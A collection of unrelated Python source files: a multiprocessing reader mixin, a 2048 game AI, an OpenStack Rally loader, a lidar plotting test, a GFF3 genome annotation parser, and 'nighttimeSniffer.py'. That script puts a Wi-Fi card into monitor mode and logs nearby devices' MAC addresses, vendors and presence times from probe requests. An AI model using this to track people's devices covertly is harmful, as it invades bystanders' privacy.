kwargs = serializer.loads(self.kwargs_spec)
for key in iter(self._qin.get, None):
item = reader[key]
if target is not None:
result = target(item, *args, **kwargs)
else:
result = item
self._qout.put(result)
self._done_flag.set()
def is_done(self):
return self._done_flag.is_set()
try:
_NPROC = mp.cpu_count()
except NotImplementedError:
_NPROC = 4
_QUEUE_TIMEOUT = 4
_QUEUE_SIZE = int(1e7)
class TaskMappingMixin(NoOpBaseReader):
def __init__(self, *args, **kwargs):
'''
Instantiate a :py:class:`TaskMappingMixin` object, set default parameters for IPC.
Parameters
----------
queue_timeout : float, keyword only, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
queue_size : int, keyword only, optional
The length of IPC queue used.
processes : int, keyword only, optional
Number of worker processes to spawn when :py:meth:`map` is called. This can also be
specified in the :py:meth:`map` call.
'''
self._queue_size = kwargs.pop('queue_size', _QUEUE_SIZE)
self._queue_timeout = kwargs.pop('timeout', _QUEUE_TIMEOUT)
self._nproc = kwargs.pop('processes', _NPROC)
super(TaskMappingMixin, self).__init__(*args, **kwargs)
def _get_reader_for_worker_spec(self):
return self
def _build_worker_spec(self, target, args, kwargs):
serialized = []
for obj, objname in [(self._get_reader_for_worker_spec(), 'reader'), (target, 'target'), (args, 'args'),
(kwargs, 'kwargs')]:
try:
serialized.append(serializer.dumps(obj))
except serializer.PicklingError:
msg = 'Could not serialize {0} {1} with {2.__name__}.'.format(objname, obj, serializer)
if serializer is not dill:
msg += ' Try installing `dill`.'
raise PyteomicsError(msg)
return serialized
def _spawn_workers(self, specifications, in_queue, out_queue, processes):
reader_spec, target_spec, args_spec, kwargs_spec = specifications
workers = []
for _ in range(processes):
worker = FileReadingProcess(
reader_spec, target_spec, in_queue, out_queue, args_spec, kwargs_spec)
workers.append(worker)
return workers
def _spawn_feeder_thread(self, in_queue, iterator, processes):
def feeder():
for key in iterator:
in_queue.put(key)
for _ in range(processes):
in_queue.put(None)
feeder_thread = threading.Thread(target=feeder)
feeder_thread.daemon = True
feeder_thread.start()
return feeder_thread
def map(self, target=None, processes=-1, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If 0 or negative,
defaults to the number of available CPUs.
This parameter can also be set at reader creation.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
if self._offset_index is None:
raise PyteomicsError('The reader needs an index for map() calls. Create the reader with `use_index=True`.')
if processes < 1:
processes = self._nproc
iterator = self._task_map_iterator()
if args is None:
args = tuple()
else:
args = tuple(args)
if kwargs is None:
kwargs = dict()
else:
kwargs = dict(kwargs)
kwargs.update(_kwargs)
serialized = self._build_worker_spec(target, args, kwargs)
in_queue = mp.Queue(self._queue_size)
out_queue = mp.Queue(self._queue_size)
workers = self._spawn_workers(serialized, in_queue, out_queue, processes)
feeder_thread = self._spawn_feeder_thread(in_queue, iterator, processes)
for worker in workers:
worker.start()
def iterate():
while True:
try:
result = out_queue.get(True, self._queue_timeout)
yield result
except Empty:
if all(w.is_done() for w in workers):
break
else:
continue
feeder_thread.join()
for worker in workers:
worker.join()
return iterate()
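    # Illustrative sketch (not part of the original class): typical use of `map` on an
    # indexed reader that mixes in TaskMappingMixin. The reader class, file name and
    # callable below are hypothetical.
    #
    #     with SomeIndexedReader('data.txt', use_index=True) as reader:
    #         for result in reader.map(target=process_entry, processes=4):
    #             ...   # results arrive in arbitrary order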
def _task_map_iterator(self):
"""Returns the :class:`Iteratable` to use when dealing work items onto the input IPC
queue used by :meth:`map`
Returns
-------
:class:`Iteratable`
"""
return iter(self._offset_index.keys())
class ChainBase(object):
"""Chain :meth:`sequence_maker` for several sources into a
single iterable. Positional arguments should be sources like
file names or file objects. Keyword arguments are passed to
the :meth:`sequence_maker` function.
Attributes
----------
sources : :class:`Iterable`
Sources for creating new sequences from, such as paths or
file-like objects
kwargs : :class:`Mapping`
Additional arguments used to instantiate each sequence
"""
def __init__(self, *sources, **kwargs):
self.sources = sources
self.kwargs = kwargs
self._iterator = None
@classmethod
def from_iterable(cls, sources, **kwargs):
return cls(*sources, **kwargs)
@classmethod
def _make_chain(cls, sequence_maker):
if isinstance(sequence_maker, type):
tp = type('%sChain' % sequence_maker.__class__.__name__, (cls,), {
'sequence_maker': sequence_maker
})
else:
tp = type('FunctionChain', (cls,), {
'sequence_maker': staticmethod(sequence_maker)
})
return tp
def sequence_maker(self, file):
raise NotImplementedError()
def _create_sequence(self, file):
return self.sequence_maker(file, **self.kwargs)
def _iterate_over_series(self):
for f in self.sources:
with self._create_sequence(f) as r:
for item in r:
yield item
def __enter__(self):
self._iterator = iter(self._iterate_over_series())
return self
def __exit__(self, *args, **kwargs):
self._iterator = None
def __iter__(self):
return self
def __next__(self):
if self._iterator is None:
self._iterator = self._iterate_over_series()
return next(self._iterator)
def next(self):
return self.__next__()
def map(self, target=None, processes=-1, queue_timeout=_QUEUE_TIMEOUT, args=None, kwargs=None, **_kwargs):
"""Execute the ``target`` function over entries of this object across up to ``processes``
processes.
Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If negative, the number of processes
will match the number of available CPUs.
queue_timeout : float, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
for f in self.sources:
with self._create_sequence(f) as r:
for result in r.map(target, processes, queue_timeout, args, kwargs, **_kwargs):
yield result
class TableJoiner(ChainBase):
def concatenate(self, results):
if pd is not None and all(isinstance(a, pd.DataFrame) for a in results):
return pd.concat(results)
if isinstance(results[0], np.ndarray):
return np.concatenate(results)
else:
return np.array([b for a in results for b in a])
def _iterate_over_series(self):
results = [self._create_sequence(f) for f in self.sources]
return self.concatenate(results)
|
nighttimeSniffer.py
|
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
try:
import subprocess
import os
import sys
import time
import json
import pyshark
import sqlite3
import datetime
import argparse
import threading
import traceback
import concurrent.futures
except KeyboardInterrupt:
    # debug() is defined further down, so plain print() is used here
    print("\n[I] Stopping...")
    raise SystemExit
except:
    print("[!] Failed to import the dependencies... " +
          "Please make sure to install all of the requirements " +
          "and try again.")
    raise SystemExit
parser = argparse.ArgumentParser(usage="packetSniffer.py [options]")
parser.add_argument("--debug", action="store_true", help="turn debug mode on")
args = parser.parse_args()
debugMode = args.debug
alreadyStopping = False
externalOptionsSet = False
if debugMode:
externalOptionsSet = True
print("[I] Showing Debug Messages...")
if externalOptionsSet:
print()
def debug(msg=""):
if debugMode:
print("[DEBUG] " + msg)
debug("Welcome to Nighttime Sniffer")
debug("[I] Selecting correct interface")
try:
    wirelessInterfaces = subprocess.check_output(["lshw", "-C", "network"])
wirelessInterfaces = str(wirelessInterfaces).split("*")
wirelessInterfaces = [x for x in wirelessInterfaces if "Ralink" in x][0].split("\\n")
interfaceName = [x for x in wirelessInterfaces if "logical name" in x][0].split(":")[1].strip()
if "mon" not in interfaceName:
subprocess.call("airmon-ng start " + interfaceName, shell=True)
interfaceName += "mon"
except:
debug("[I] Error setting up interface. Are you sure adapter is plugged in?")
sys.exit(1)
debug("[I] Grabbing Customer Data From Server")
try:
#TODO
#Grab from server
#Write to serverInfo.json
#Check documentation for specific way to write data
str = 1 + "hello" #Causes try block to fail and except loop to run
except:
debug("[I] Server information not read")
serverFile = open("serverInfo.json","r")
serverInfo = json.load(serverFile)
serverFile.close()
debug("[I] Loading OUI Database...")
try:
ouiFile = open("oui.json", "r")
ouiObj = json.load(ouiFile)
ouiFile.close()
except:
debug("[I] Couldn't resolve OUI database")
ouiObj = {}
debug("[I] Logging Current Time")
currentTime = datetime.datetime.now()
debug("[I] Setting Wake Time")
wakeHour = (int(serverInfo["sleepTime"].split(":")[0]) + 1 + serverInfo["tzOffset"]) % 24
wakeMinute = serverInfo["sleepTime"].split(":")[1]
debug(str(wakeHour)+" " + wakeMinute)
debug("[I] Updating Cron Job")
try:
subprocess.call("rm /etc/cron.d/digitalB_nighttime",shell=True)
except:
debug("[I] Couldn't call processes to remove cronjob")
subprocess.call("touch /etc/cron.d/digitalB_nighttime",shell=True)
nighttimeJob = open("/etc/cron.d/digitalB_nighttime","w")
nighttimeCommand = "{} {} * * * root cd /root/DigitalB_Sniffer && /usr/bin/python3 nighttimeSniffer.py".format(wakeMinute, wakeHour)
nighttimeJob.write(nighttimeCommand)
nighttimeJob.close()
debug("[I] Setting Sleep Time")
sleepDate = datetime.date.today() + datetime.timedelta(days = 1)
sleepHour = (int(serverInfo["wakeTime"].split(":")[0]) - 1 + serverInfo["tzOffset"]) % 24
sleepMin = int(serverInfo["wakeTime"].split(":")[1])
sleepTime = datetime.time(hour=sleepHour,minute=sleepMin,second=0)
sleepTime = datetime.datetime.combine(sleepDate,sleepTime)
debug("[I] Initiliazing Dictionary")
deviceDictionary = {}
def stop():
global alreadyStopping
debug("stoping called")
if not alreadyStopping:
debug("setting stopping to true")
alreadyStopping = True
debug("\n[I] Stopping...")
debug("[I] Saving results to overnight_capture.db")
saveToMySQL()
debug("[I] Results saved to overnight_capture.db")
debug("[I] Trying to read from capture_devices.json")
try:
file = open("constant_devices.json", "r")
constant_devices = json.load(file)
file.close()
except:
constant_devices = []
debug("[I] Updating list of constant_devices")
db = sqlite3.connect("overnight_capture.db")
cur = db.cursor()
cur.execute("SELECT * FROM packetSniffer")
rows = cur.fetchall()
for row in rows:
if row[3] != 1:
                startTime = datetime.datetime.strptime(row[4], "%Y-%m-%d %H:%M:%S")
                stopTime = datetime.datetime.strptime(row[5], "%Y-%m-%d %H:%M:%S")
if ((stopTime - startTime).total_seconds() / 3600) > 6:
if str(row[0]) not in constant_devices:
constant_devices.append(str(row[0]))
file = open("constant_devices.json","w")
file.write(json.dumps(constant_devices))
file.close()
subprocess.call("rm overnight_capture.db", shell = True)
debug("Stopped at: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
debug("[I] packetSniffer stopped.")
raise SystemExit
def channelHopper():
while True:
if not alreadyStopping:
channels = [1, 6, 11]
for channel in channels:
subprocess.call("iwconfig " + interfaceName + " channel " +
str(channel) + " > /dev/null 2>&1", shell=True)
debug("[CHOPPER] HI IM RUNNING THIS COMMAND: " +
"iwconfig " + interfaceName + " channel " + str(channel))
debug("[CHOPPER] HI I CHANGED CHANNEL TO " + str(channel))
time.sleep(5)
else:
debug("[CHOPPER] IM STOPPING TOO")
sys.exit()
def deviceUpdater():
while True:
if not alreadyStopping:
debug("[I] " + str(len(deviceDictionary))+ " devices found")
cpuTemp = subprocess.check_output(["cat", "/sys/class/thermal/thermal_zone0/temp"])
cpuTemp = int(cpuTemp) / 1000
debug("[I] Cpu Temp: " + str(cpuTemp))
debug("[I] Time: " + str(currentTime))
saveToMySQL()
time.sleep(900)
else:
debug("[deviceUpdate] IM STOPPING TOO")
sys.exit()
def resolveMac(mac):
global ouiObj
if mac[:8].upper() in ouiObj:
return ouiObj[mac[:8].upper()]
return "COULDNT-RESOLVE"
def packetHandler(pkt):
try:
global currentTime
global deviceDictionary
rssi = pkt.radiotap.dbm_antsignal
mac_address = pkt.wlan.ta
vendor = resolveMac(mac_address)
currentTime = datetime.datetime.now()
if mac_address in deviceDictionary:
deviceDictionary[mac_address]["timeLastSeen"] = currentTime.strftime("%Y-%m-%d %H:%M:%S")
deviceDictionary[mac_address]["timesCounted"] += 1
if rssi < deviceDictionary[mac_address]["RSSI"]:
deviceDictionary[mac_address]["RSSI"] = rssi
else:
deviceDictionary[mac_address] = {"RSSI":rssi, "Vendor":vendor,
"timesCounted":1, "timeFirstSeen": currentTime.strftime("%Y-%m-%d %H:%M:%S"),
"timeLastSeen":"N/A"}
except KeyboardInterrupt:
stop()
except:
debug("[!!!] CRASH IN packetHandler")
debug(traceback.format_exc())
def saveToMySQL():
try:
global deviceDictionary
debug("saveToMySQL called")
db = sqlite3.connect("overnight_capture.db")
cursor = db.cursor()
for m in deviceDictionary:
r = deviceDictionary[m]["RSSI"]
v = deviceDictionary[m]["Vendor"]
tc = deviceDictionary[m]["timesCounted"]
tfs = deviceDictionary[m]["timeFirstSeen"]
tls = deviceDictionary[m]["timeLastSeen"]
cursor.execute("INSERT OR REPLACE INTO packetSniffer (mac_address, vendor, rssi, timesCounted, timeFirstSeen, timeLastSeen) VALUES (?,?,?,?,?,?)", (m,v,r,tc,tfs,tls))
db.commit()
db.close()
except:
debug("Crash saveSQL")
debug("[!!!] CRASH IN saveToMySQL")
debug(traceback.format_exc())
def main():
global alreadyStopping
debug("[I] Setting up SQLite...")
try:
setupDB = sqlite3.connect("overnight_capture.db")
except:
debug("\n[!] Cant connect to database. Permission error?\n")
exit()
setupCursor = setupDB.cursor()
setupCursor.execute("DROP TABLE IF EXISTS packetSniffer")
setupCursor.execute(
"""CREATE TABLE packetSniffer
(mac_address VARCHAR(50) primary key, vendor VARCHAR(50),
rssi INT, timesCounted INT, timeFirstSeen VARCHAR(50),
timeLastSeen VARCHAR(50))""")
setupDB.commit()
setupDB.close()
debug("[I] Starting channelhopper in a new thread...")
path = os.path.realpath(__file__)
chopper = threading.Thread(target=channelHopper)
chopper.daemon = True
chopper.start()
debug("[I] Starting deviceUpdater in a new thread...")
path = os.path.realpath(__file__)
updater = threading.Thread(target=deviceUpdater)
updater.daemon = True
updater.start()
debug("\n[I] Sniffing started... Please wait for requests to show up...\n")
while True:
try:
timeoutPeriod = (sleepTime - currentTime).total_seconds()
capture = pyshark.LiveCapture(interface=interfaceName, bpf_filter="type mgt subtype probe-req")
capture.apply_on_packets(packetHandler, timeout = timeoutPeriod)
except KeyboardInterrupt:
stop()
except concurrent.futures.TimeoutError:
stop()
except:
debug("[!] An error occurred. Debug:")
debug(traceback.format_exc())
debug("[!] Restarting in 5 sec... Press CTRL + C to stop.")
try:
time.sleep(5)
except:
stop()
if __name__ == "__main__":
main()
|
PlayerAI_3.py
|
import multiprocessing
import sys
import time
import logging
from logging.handlers import RotatingFileHandler
from BaseAI_3 import BaseAI
from CompositeCalculation import CompositeUtilityCalculator
from FastGrid import FastGrid
from algorithms import *
deadline_offset = 0.1 # mandated solution timeout for exercise is .1 secs
max_depth_allowed = 6 # how deep to search for solutions
# some constants for initialising alpha and beta values in minimax
plus_infinity = float(sys.maxsize)
minus_infinity = -1.0 * plus_infinity
def init_logging():
global log
log = logging.getLogger('PlayerAI')
log.setLevel(logging.DEBUG)
fh = RotatingFileHandler('am-2048.log', mode='a', maxBytes=10000000, backupCount=3)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
log.addHandler(fh)
init_logging()
class PlayerAI(BaseAI):
def __init__(self):
self.fitness = CompositeUtilityCalculator()
def invoke_minimax(self, ctx, soln, result_queue):
score = minimax_with_ab_pruning(ctx, soln)
result_queue.put((soln.move, score))
def getMove(self, slowgrid):
log.info("get move")
grid = FastGrid(slowgrid)
ctx = SolutionContext(board=grid
, depth=0
, alpha=-float("inf")
, beta=float("inf")
, timeout=time.process_time() + 0.1
, previous_move=None
, fn_fitness=lambda c, s: self.fitness.compute_utility(s.board)*
pow(0.9, max_depth_allowed - c.depth + 1)
                              , fn_terminate=lambda c, s: c.depth == max_depth_allowed or s.board.canMove())
result_queue = multiprocessing.Queue()
args = []
for m in grid.get_moves(True):
args.append((ctx, Solution(move=m,
board=ctx.board.move(m.direction),
is_max=True), result_queue))
jobs = [multiprocessing.Process(target=self.invoke_minimax, group=None, args=mc) for mc in args]
for job in jobs: job.start()
for job in jobs: job.join()
results = [result_queue.get() for arg in args]
result = max(results, key=lambda s: s[1])
return result[0].direction
# some resources
# http://www.wikihow.com/Beat-2048#Step_by_Step_Strategy_Guide_sub
# http://stackoverflow.com/questions/22342854/what-is-the-optimal-algorithm-for-the-game-2048
|
rally_loader.py
|
# Copyright 2016 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import os
import threading
import time
from oslo_config import cfg
from oslo_db import options as db_options
from oslo_db.exception import DBNonExistentTable
from rally import api as rally_api
from rally import consts as rally_consts
from rally.common import db
from rally.cli.commands import deployment as deployment_cli
from rally.cli.commands import task as task_cli
from rally.exceptions import DeploymentNotFound
from rally.exceptions import RallyException
from rally.exceptions import ValidationError
from rally.plugins import load as load_rally_plugins
from sqlalchemy.exc import OperationalError
from voluptuous import Schema, Required, Optional
from cloud99.logging_setup import LOGGER
from cloud99.loaders import BaseLoader
CONF = cfg.CONF
class RallyLoader(BaseLoader):
schema = Schema({
Required("scenario_file"): str,
Optional("scenario_args"): Schema({
Optional("concurrency"): int,
Optional("tenant"): int,
Optional("users_per_tenant"): int,
Optional("max_concurrency"): int,
Optional("rps"): int,
Optional("times"): int,
}, extra=True),
Optional("scenario_args_file"): str,
Required("start_delay"): int,
Optional("deployment_name"): str,
Optional("db"): Schema({
Required("host"): str,
Required("user"): str,
Required("password"): str,
Required("name"): str
})
})
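    # Illustrative sketch (not part of the original class): a params mapping that
    # satisfies the schema above (all values are hypothetical).
    #
    #     params = {
    #         "scenario_file": "boot-and-delete.yaml",
    #         "scenario_args": {"times": 10, "concurrency": 2},
    #         "start_delay": 30,
    #         "deployment_name": "cloud99-rally",
    #         "db": {"host": "127.0.0.1", "user": "rally",
    #                "password": "secret", "name": "rally"},
    #     }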
conn_template = "mysql://{user}:{passwd}@{host}/{db_name}"
# TODO (dratushnyy) this should be configurable
scenarios_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
"../../../scenarios/rally"))
def __init__(self, observer, openrc, inventory, **params):
super(RallyLoader, self).__init__(observer, openrc, inventory,
**params)
self.scenario_file = os.path.abspath(os.path.join(
RallyLoader.scenarios_path, params['scenario_file']))
# TODO (dratushnyy) fallback to default path only if file not found
self.scenario_args_file = params.get('scenario_args_file', None)
if self.scenario_args_file:
self.scenario_args_file = os.path.abspath(os.path.join(
RallyLoader.scenarios_path, self.scenario_args_file))
self.start_delay = params['start_delay']
self.deployment_name = params['deployment_name']
self.deployment_config = {
"type": "ExistingCloud",
"admin": {
"username": openrc["username"],
"password": openrc["password"],
"tenant_name": openrc["tenant_name"]
},
"auth_url": openrc["auth_url"],
"region_name": openrc["region_name"],
"https_insecure": openrc['https_insecure'],
"https_cacert": openrc["https_cacert"]
}
self.scenario_args = params.get('scenario_args', None)
# Need to be set to None to avoid exception in stop() method
self.rally_task = None
load_rally_plugins()
if params.get('db'):
db_connection = RallyLoader.conn_template.format(
user=params["db"]["user"],
passwd=params["db"]["pass"],
host=params["db"]["host"],
db_name=params["db"]["name"])
db_options.set_defaults(CONF, connection=db_connection)
try:
rally_api.Deployment.get(self.deployment_name)
except DBNonExistentTable as e:
db.schema_create()
except DeploymentNotFound as e:
try:
rally_api.Deployment.create(config=self.deployment_config,
name=self.deployment_name)
except ValidationError as e:
LOGGER.exception(e)
raise e
except OperationalError as e:
LOGGER.exception(e)
raise e
# Since there is no api method to do this - using cli
deployment_cli.DeploymentCommands().use(self.deployment_name)
# Using rally task cli to load and validate task
        # TODO check if the API supports this
try:
self.scenario_config = task_cli.TaskCommands().\
_load_and_validate_task(self.scenario_file,
json.dumps(self.scenario_args),
self.scenario_args_file,
self.deployment_name)
except Exception as e:
LOGGER.exception(e)
raise e
def execute(self, params=None):
if params is None:
params = {}
for k, v in params.items():
for name in self.scenario_config.keys():
self.scenario_config[name][0]['runner'].update({k: v})
time.sleep(self.start_delay)
self.rally_task = rally_api.Task.create(self.deployment_name,
"cloud99")
self.runner_thread = threading.Thread(name=__name__,
target=self.load)
self.checker_thread = threading.Thread(name=__name__,
target=self.check)
LOGGER.debug("Starting task {task_id}".format(
task_id=self.rally_task.task["uuid"]))
self.runner_thread.start()
self.checker_thread.start()
def validate_config(self):
try:
rally_api.Task.validate(self.deployment_name,
self.scenario_config,
task_instance=self.rally_task)
except Exception as e:
print(e)
LOGGER.exception(e)
self.observer.tell({'msg': 'validation_complete', 'valid': False})
self.observer.tell({'msg': 'validation_complete', 'valid': True})
def abort(self):
try:
rally_api.Task.abort(self.rally_task.task["uuid"])
except RallyException as e:
LOGGER.exception(e)
finally:
self.runner_thread.join()
self.checker_thread.join()
res = rally_api.Task.get_detailed(self.rally_task.task["uuid"])
self.times = len(res["results"][0]["data"]["raw"])
# This will print standard rally report
task_cli.TaskCommands().detailed(
task_id=self.rally_task.task['uuid'])
self.observer.tell({'msg': 'loader_finished', "times": self.times})
def load(self):
# wrapper to run actual rally task in separate thread
# this needed b/c rally_api.Task.start is a blocking call,
# and the actor thread will not receive any messages while
# task is running, so it will be not able to abort task execution.
self.observer.tell({'msg': 'loader_started'})
rally_api.Task.start(self.deployment_name, self.scenario_config,
self.rally_task)
def check(self):
while True:
statuses = [rally_consts.TaskStatus.FINISHED,
rally_consts.TaskStatus.FAILED]
task_status = self.rally_task.get_status(
self.rally_task.task['uuid'])
if task_status in statuses:
self.observer.tell({'msg': 'loader_finished'})
# This will print standard rally report
task_cli.TaskCommands().detailed(
task_id=self.rally_task.task['uuid'])
break
elif task_status == rally_consts.TaskStatus.ABORTED:
break
time.sleep(2.0)
|
PyLidar3_test.py
|
import threading
import PyLidar3
import matplotlib.pyplot as plt
import math
import time
def draw():
global is_plot
while is_plot:
plt.figure(1)
plt.cla()
plt.ylim(-4000,4000)
plt.xlim(-4000,4000)
plt.scatter(x,y,c='r',s=8)
plt.pause(0.001)
plt.close("all")
is_plot = True
x=[]
y=[]
for _ in range(360):
x.append(0)
y.append(0)
port = 'COM13' # input("Enter port name which lidar is connected:") #windows
Obj = PyLidar3.YdLidarX4(port) #PyLidar3.your_version_of_lidar(port,chunk_size)
threading.Thread(target=draw).start()
if(Obj.Connect()):
print(Obj.GetDeviceInfo())
gen = Obj.StartScanning()
t = time.time() # start time
while (time.time() - t) < 30: #scan for 30 seconds
data = next(gen)
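        # data maps each angle (0-359 degrees) to a distance reading (millimetres,
        # judging by the +/-4000 plot limits); the loop below converts the polar
        # readings to x/y coordinates for plotting.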
for angle in range(0,360):
if(data[angle]>1000):
x[angle] = data[angle] * math.cos(math.radians(angle))
y[angle] = data[angle] * math.sin(math.radians(angle))
is_plot = False
Obj.StopScanning()
Obj.Disconnect()
else:
print("Error connecting to device")
|
gff3.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016-2020 - Sequana Development Team
#
# File author(s):
# Thomas Cokelaer <[email protected]>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
import re
import os
# from bioconvert/io/gff3 and adapted later on
from sequana.annotations import Annotation
from easydev import do_profile
import colorlog
logger = colorlog.getLogger(__name__)
__all__ = ["GFF3"]
class GFF3(Annotation):
"""Read a GFF file, version 3
.. seealso:: https://github.com/The-Sequence-Ontology/Specifications/blob/master/gff3.md
::
g = GFF3(filename)
# first call is slow
g.df
# print info about the different feature types
g.features
# prints info about duplicated attributes:
        g.get_duplicated_attributes_per_type()
On eukaryotes, the reading and processing of the GFF may take a while.
On prokaryotes, it should be pretty fast (a few seconds).
    To speed up the eukaryote case, we skip processing of biological_region
    entries (50% of the data in mouse).
"""
def __init__(self, filename, skip_types=['biological_region']):
self.filename = filename
assert os.path.exists(filename)
self._df = None
self._features = set()
self._attributes = set()
self.skip_types = skip_types
def _get_features(self):
"""Extract unique GFF feature types
This is equivalent to awk '{print $3}' | sort | uniq to extract unique GFF
        types. No sanity check, this is supposed to be fast.
Less than a few seconds for mammals.
"""
# This is used by the rnaseq pipeline and should be kept fast
count = 0
if self._features:
features = self._features
else:
features = set()
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
split = line.rstrip().split("\t")
L = len(split)
if L == 9:
features.add(split[2])
count += 1
# FIXME may be overwritten by get_df
self._features = features
return sorted(features)
features = property(_get_features)
def get_attributes(self, feature=None, sep=";"):
"""Return list of possible attributes
If feature is provided, must be valid and used as a filter
to keep only entries for that feature.
"""
# This is used by the rnaseq pipeline and should be kept fast
if self._attributes:
return self._attributes
attributes = set()
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments and empty lines
if line.startswith("#") or not line.strip():
continue
split = line.rstrip().split("\t")
if feature and split[2] != feature:
continue
for item in split[8].split(sep):
item = item.strip()
if len(item) == 0: # empty final string #pragma: no cover
continue
# Here, some GFF use = some others use spaces... very
# annoying.
if "=" in item:
item = item.split("=")[0].strip()
else:
item = item.split()[0].strip()
attributes.add(item)
self._attributes = sorted(attributes)
return self._attributes
attributes = property(get_attributes)
""" THis is a multiprocess version but is twice as slow as normal version...
keep this code for book-keeping for now
def _process_chunk(self, chunk, queue):
results = []
print('processing')
for line in chunk:
line = line.strip()
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip():
continue
# Format checking
split = line.rstrip().split("\t")
annotation = self._process_main_fields(split[0:8])
# + 15 seconds
annotation["attributes"] = self._process_attributes(split[8])
results.append(annotation)
queue.put(results)
def _queue_reader(self, q):
return q.get()
def read_large_gff(self, chunksize=2000000):
from itertools import islice
S = 0
import multiprocessing as mp
pool = mp.Pool(4)
manager = mp.Manager()
queue = manager.Queue()
count = 0
with open(self.filename, "r") as reader:
while True:
chunk = list(islice(reader, chunksize))
count += 1
print(len(chunk))
mp.Process(target=self._process_chunk, args=(chunk, queue)).start()
if len(chunk) < chunksize:
break
print(1)
readers = []
for i in range(count):
readers.append(pool.apply_async(self._queue_reader, (queue, )))
results = []
for r in readers:
results.extend(r.get())
return results
"""
def read(self):
""" Read annotations one by one creating a generator """
count = 0
self._features = set()
# we could use a yield but gff for eukaryotes can be read on a laptop
results = []
with open(self.filename, "r") as reader:
line = None
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip():
continue
# Format checking
split = line.rstrip().split("\t")
#if split[2].strip() in self.skip_types:
# continue
L = len(split)
if L != 9 and L != 0: # pragma: no cover
msg = "Incorrect format on line ({}). Expected 9 items, found {}. Skipped"
print(msg.format(count, L))
print(line.strip())
count += 1
continue
# 9 seconds without annotation
# + 3 seconds for process_main
self._features.add(split[2])
annotation = self._process_main_fields(split[0:8])
# + 15 seconds
annotation["attributes"] = self._process_attributes(split[8])
count += 1
results.append(annotation)
return results
def _get_df(self):
if self._df is not None:
return self._df
logger.info("Processing GFF file. 1. Reading the input file. Please be patient")
# ~ 30 seconds on mouse
data = self.read()
# ~ 6 seconds on mouse
logger.info("Processing GFF file. 2. Transforming into dataframe")
import pandas as pd
df = pd.DataFrame(data)
def get_attr(x, name):
if name in x:
# some GFF adds " around names which is annoying
return x[name].replace("'", "").replace('"', "")
else:
return None
logger.info("Processing GFF file. 3. Processing attributes")
try:
# 10 seconds on mm10
attributes = self.attributes
for attribute in attributes:
df[attribute] = [get_attr(x, attribute) for x in df["attributes"]]
except Exception as err: # pragma: no cover
print(err)
df["ID"] = [get_attr(x, "ID") for x in df["attributes"]]
df["description"] = [get_attr(x, "description") for x in df["attributes"]]
self._df = df
return self._df
df = property(_get_df)
def get_duplicated_attributes_per_type(self):
results = {}
for typ in self.features:
results[typ] = {}
print("{}: {} entries".format(typ, len(self.df.query("type==@typ"))))
for attr in sorted(self.attributes):
dups = self.df.query("type==@typ")[attr].dropna().duplicated().sum()
if dups > 0:
print(" - {}:{} duplicates".format(attr, dups))
else:
print(" - {}:No duplicates".format(attr))
results[typ][attr] = dups
import pandas as pd
df = pd.DataFrame(results)
return df
def transcript_to_gene_mapping(self, feature="all", attribute="transcript_id"):
"""
:param feature: not used yet
        :param attribute: the attribute to be used. Should be transcript_id for
            salmon compatibility but could use something different.
"""
# entries may have transcripts set to None
transcripts = [x for x in self.df[attribute] if x]
# retrieve only the data with transcript id defined
transcripts_df = self.df.set_index(attribute)
transcripts_df = transcripts_df.loc[transcripts]
transcripts_df = transcripts_df.reset_index()
results = {}
from collections import defaultdict
results2 = defaultdict(list)
for _id, data in transcripts_df[['ID', 'Parent']].iterrows():
results[data.values[0]] = data.values[1]
results2[data.values[1]].append(data.values[0])
return results, results2
def save_annotation_to_csv(self, filename="annotations.csv"):
self.df.to_csv(filename, index=False)
def save_gff_filtered(
self, filename="filtered.gff", features=["gene"], replace_seqid=None
):
"""
save_gff_filtered("test.gff", features=['misc_RNA', 'rRNA'],
replace_seqid='locus_tag')
"""
with open(filename, "w") as fout:
fout.write("#gff-version 3\n#Custom gff from sequana\n")
count = 0
from collections import defaultdict
counter = defaultdict(int)
for x, y in self.df.iterrows():
if y["type"] in features:
if replace_seqid:
y["seqid"] = y["attributes"][replace_seqid]
fout.write(
"{}\tfeature\tcustom\t{}\t{}\t.\t{}\t{}\t{}\n".format(
y["seqid"],
y["start"],
y["stop"],
